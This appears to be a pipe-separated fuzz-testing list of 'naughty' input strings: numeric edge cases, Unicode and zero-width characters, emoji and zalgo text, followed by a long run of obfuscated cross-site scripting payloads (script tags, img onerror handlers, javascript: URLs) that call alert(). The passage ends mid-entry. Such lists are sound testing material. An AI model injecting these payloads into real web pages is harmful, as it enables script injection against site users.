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undefined | undef | null | NULL | (null) | nil | NIL | true | false | True | False | TRUE | FALSE | None | hasOwnProperty | then | constructor | \ | \\ | 0 | 1 | 1.00 | $1.00 | 1/2 | 1E2 | 1E02 | 1E+02 | -1 | -1.00 | -$1.00 | -1/2 | -1E2 | -1E02 | -1E+02 | 1/0 | 0/0 | -2147483648/-1 | -9223372036854775808/-1 | -0 | -0.0 | +0 | +0.0 | 0.00 | 0..0 | . | 0.0.0 | 0,00 | 0,,0 | , | 0,0,0 | 0.0/0 | 1.0/0.0 | 0.0/0.0 | 1,0/0,0 | 0,0/0,0 | --1 | - | -. | -, | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 | NaN | Infinity | -Infinity | INF | 1#INF | -1#IND | 1#QNAN | 1#SNAN | 1#IND | 0x0 | 0xffffffff | 0xffffffffffffffff | 0xabad1dea | 123456789012345678901234567890123456789 | 1,000.00 | 1 000.00 | 1'000.00 | 1,000,000.00 | 1 000 000.00 | 1'000'000.00 | 1.000,00 | 1 000,00 | 1'000,00 | 1.000.000,00 | 1 000 000,00 | 1'000'000,00 | 01000 | 08 | 09 | 2.2250738585072011e-308 | ,./;'[]\-= | &lt;&gt;?:"{}|_+ | !@#$%^&amp;*()`~ |  |  | \t \u0085             ​\u2028\u2029  　 | ­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿 | ﻿ |  | Ω≈ç√∫˜µ≤≥÷ | åß∂ƒ©˙∆˚¬…æ | œ∑´®†¥¨ˆøπ“‘ | ¡™£¢∞§¶•ªº–≠ | ¸˛Ç◊ı˜Â¯˘¿ | ÅÍÎÏ˝ÓÔÒÚÆ☃ | Œ„´‰ˇÁ¨ˆØ∏”’ | `⁄€‹›ﬁﬂ‡°·‚—± | ⅛⅜⅝⅞ | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя | ٠١٢٣٤٥٦٧٨٩ | ⁰⁴⁵ | ₀₁₂ | ⁰⁴⁵₀₁₂ | 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 | ' | " | '' | “” | ‘"’ | “''''"'” | “'"'"''''” | &lt;foo val=“bar” /&gt; | &lt;foo val=“bar” /&gt; | &lt;foo val=”bar“ /&gt; | &lt;foo val=`bar' /&gt; | 田中さんにあげて下さい | パーティーへ行かないか | 和製漢語 | 部落格 | 사회과학원 어학연구소 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 | 社會科學院語學研究所 | 울란바토르 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 | 𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆 | 表 | ポ | あ | A | 鷗 | Œ | é | Ｂ | 逍 | Ü | ß | ª | ą | ñ | 丂 | 㐀 | 𠀀 | Ⱥ | Ⱦ | ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ | (｡◕ ∀ ◕｡) | ｀ｨ(´∀｀∩ | __ﾛ(,_,*) | ・(￣∀￣)・:*: | ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ | (╯°□°）╯︵ ┻━┻) | (ﾉಥ益ಥ）ﾉ﻿ ┻━┻ | ┬─┬ノ( º _ ºノ) | ( ͡° ͜ʖ ͡°) | ¯\_(ツ)_/¯ | 😍 | 👩🏽 | 👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️ | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 | 🐵 🙈 🙉 🙊 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 | 👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 | 🇺🇸🇷🇺🇸🇦 | １２３ | ١٢٣ | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ | הָיְתָהtestالصفحات التّحول | ﷽ | ﷺ | مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، | الكل في المجمو عة (5) | ᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜ | ᚛                 ᚜ | ‪‪test‪ | ‫test‫ |  test  | test⁠test‫ | ⁦test⁧ | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ | 00˙Ɩ$- | Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ | 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 | 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 | 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 | 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 | 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 | 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 | ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ | &lt;script&gt;alert(0)&lt;/script&gt; | &amp;lt;script&amp;gt;alert(&amp;#39;1&amp;#39;);&amp;lt;/script&amp;gt; | &lt;img src=x onerror=alert(2) /&gt; | &lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt; | “&gt;&lt;script&gt;alert(4)&lt;/script&gt; | '&gt;&lt;script&gt;alert(5)&lt;/script&gt; | &gt;&lt;script&gt;alert(6)&lt;/script&gt; | &lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt; | &lt; / script &gt;&lt; script &gt;alert(8)&lt; / script &gt; |  onfocus=JaVaSCript:alert(9) autofocus | " onfocus=JaVaSCript:alert(10) autofocus | ' onfocus=JaVaSCript:alert(11) autofocus | ＜script＞alert(12)＜/script＞ | &lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt; | --&gt;&lt;script&gt;alert(14)&lt;/script&gt; | “;alert(15);t=” | ‘;alert(16);t=’ | JavaSCript:alert(17) | ;alert(18); | src=JaVaSCript:prompt(19) | “&gt;&lt;script&gt;alert(20);&lt;/script x=” | ‘&gt;&lt;script&gt;alert(21);&lt;/script x=’ | &gt;&lt;script&gt;alert(22);&lt;/script x= | " autofocus onkeyup=“javascript:alert(23) | ' autofocus onkeyup='javascript:alert(24) | &lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt; | &lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt; | &lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt; | &lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt; | &lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt; | &lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt; | &lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt; | '`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt; | '`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt; | ABC&lt;div style=“x\x3Aexpression(javascript:alert(34)"&gt;DEF | ABC&lt;div style=“x:expression\x5C(javascript:alert(35)"&gt;DEF | ABC&lt;div style=“x:expression\x00(javascript:alert(36)"&gt;DEF | ABC&lt;div style=“x:exp\x00ression(javascript:alert(37)"&gt;DEF | ABC&lt;div style=“x:exp\x5Cression(javascript:alert(38)"&gt;DEF | ABC&lt;div style=“x:\x0Aexpression(javascript:alert(39)"&gt;DEF | ABC&lt;div style=“x:\x09expression(javascript:alert(40)"&gt;DEF | ABC&lt;div style=“x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF | ABC&lt;div style=“x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF | ABC&lt;div style=“x:\x0Dexpression(javascript:alert(46)"&gt;DEF | ABC&lt;div style=“x:\x0Cexpression(javascript:alert(47)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF | ABC&lt;div style=“x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF | ABC&lt;div style=“x:\x20expression(javascript:alert(50)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF | ABC&lt;div style=“x:\x00expression(javascript:alert(52)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF | ABC&lt;div style=“x:\x0Bexpression(javascript:alert(57)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF | &lt;a href="\x0Bjavascript:javascript:alert(61)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Fjavascript:javascript:alert(62)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xC2\xA0javascript:javascript:alert(63)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x05javascript:javascript:alert(64)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x18javascript:javascript:alert(66)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x11javascript:javascript:alert(67)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x88javascript:javascript:alert(68)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x89javascript:javascript:alert(69)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x80javascript:javascript:alert(70)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x17javascript:javascript:alert(71)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x03javascript:javascript:alert(72)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Ejavascript:javascript:alert(73)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Ajavascript:javascript:alert(74)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x00javascript:javascript:alert(75)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x10javascript:javascript:alert(76)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x82javascript:javascript:alert(77)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x20javascript:javascript:alert(78)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x13javascript:javascript:alert(79)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x09javascript:javascript:alert(80)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(81)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x14javascript:javascript:alert(82)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x19javascript:javascript:alert(83)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xAFjavascript:javascript:alert(84)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Fjavascript:javascript:alert(85)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x81javascript:javascript:alert(86)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Djavascript:javascript:alert(87)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x87javascript:javascript:alert(88)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x07javascript:javascript:alert(89)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE1\x9A\x80javascript:javascript:alert(90)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x83javascript:javascript:alert(91)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x04javascript:javascript:alert(92)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x01javascript:javascript:alert(93)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x08javascript:javascript:alert(94)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x84javascript:javascript:alert(95)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x86javascript:javascript:alert(96)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE3\x80\x80javascript:javascript:alert(97)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x12javascript:javascript:alert(98)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Djavascript:javascript:alert(99)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Ajavascript:javascript:alert(100)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Cjavascript:javascript:alert(101)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x15javascript:javascript:alert(102)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA8javascript:javascript:alert(103)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x16javascript:javascript:alert(104)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x02javascript:javascript:alert(105)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Bjavascript:javascript:alert(106)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x06javascript:javascript:alert(107)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA9javascript:javascript:alert(108)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x85javascript:javascript:alert(109)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Ejavascript:javascript:alert(110)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Cjavascript:javascript:alert(112)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x00:javascript:alert(113)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x3A:javascript:alert(114)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x09:javascript:alert(115)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x0D:javascript:alert(116)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x0A:javascript:alert(117)” id=“fuzzelement1”&gt;test&lt;/a&gt; | `"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt; | `"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt; | `"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt; | `"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt; | `"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt; | `"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt; | `"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt; | `"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt; | `"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt; | `"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt; | "`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt; | "`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt; | &lt;img \x00src=x onerror="alert(165)"&gt; | &lt;img \x47src=x onerror="javascript:alert(166)"&gt; | &lt;img \x11src=x onerror="javascript:alert(167)"&gt; | &lt;img \x12src=x onerror="javascript:alert(168)"&gt; | &lt;img\x47src=x onerror="javascript:alert(169)"&gt; | &lt;img\x10src=x onerror="javascript:alert(170)"&gt; | &lt;img\x13src=x onerror="javascript:alert(171)"&gt; | &lt;img\x32src=x onerror="javascript:alert(172)"&gt; | &lt;img\x47src=x onerror="javascript:alert(173)"&gt; | &lt;img\x11src=x onerror="javascript:alert(174)"&gt; | &lt;img \x47src=x onerror="javascript:alert(175)"&gt; | &lt;img \x34src=x onerror="javascript:alert(176)"&gt; | &lt;img \x39src=x onerror="javascript:alert(177)"&gt; | &lt;img \x00src=x onerror="javascript:alert(178)"&gt; | &lt;img src\x09=x onerror="javascript:alert(179)"&gt; | &lt;img src\x10=x onerror="javascript:alert(180)"&gt; | &lt;img src\x13=x onerror="javascript:alert(181)"&gt; | &lt;img src\x32=x onerror="javascript:alert(182)"&gt; | &lt;img src\x12=x onerror="javascript:alert(183)"&gt; | &lt;img src\x11=x onerror="javascript:alert(184)"&gt; | &lt;img src\x00=x onerror="javascript:alert(185)"&gt; | &lt;img src\x47=x onerror="javascript:alert(186)"&gt; | &lt;img src=x\x09onerror="javascript:alert(187)"&gt; | &lt;img src=x\x10onerror="javascript:alert(188)"&gt; | &lt;img src=x\x11onerror="javascript:alert(189)"&gt; | &lt;img src=x\x12onerror="javascript:alert(190)"&gt; | &lt;img src=x\x13onerror=“javascript:alert(191)"&gt; | &lt;img[a][b][c]src[d]=x[e]onerror=[f]“alert(192)"&gt; | &lt;img src=x onerror=\x09"javascript:alert(193)"&gt; | &lt;img src=x onerror=\x10"javascript:alert(194)"&gt; | &lt;img src=x onerror=\x11"javascript:alert(195)"&gt; | &lt;img src=x onerror=\x12"javascript:alert(196)"&gt; | &lt;img src=x onerror=\x32"javascript:alert(197)"&gt; | &lt;img src=x onerror=\x00"javascript:alert(198)"&gt; | &lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt; | &lt;img src=“x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt; | &lt;img src onerror /” '"= alt=javascript:alert(201)//"&gt; | &lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt; | &lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt; | &lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt; | &lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt; | &lt;script src="/\%(jscript)s”&gt;&lt;/script&gt; | &lt;script src="\\%(jscript)s”&gt;&lt;/script&gt; | &lt;IMG 